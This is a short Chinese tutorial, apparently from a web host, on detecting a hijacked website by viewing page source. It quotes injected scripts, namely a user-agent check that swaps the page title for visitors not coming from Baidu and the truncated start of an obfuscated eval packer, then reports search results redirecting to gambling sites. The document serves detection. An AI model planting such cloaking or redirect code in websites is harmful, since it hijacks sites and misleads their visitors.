最近有一客户反馈网站似乎被挂马,所以今天我们来谈谈如何查看网站是否被挂马?
首先打开网站,右击查看网页源代码
然后查看代码,我们发现网页的标题已经被更改,并且有针对百度进入的JS跳转代码
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XXXX"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while 然后我们再通过百度搜索域名查看: 网站收录内容已经变成赌球网站了,点击进入后更是直接跳转赌博网站。 确认网站程序被挂马无疑。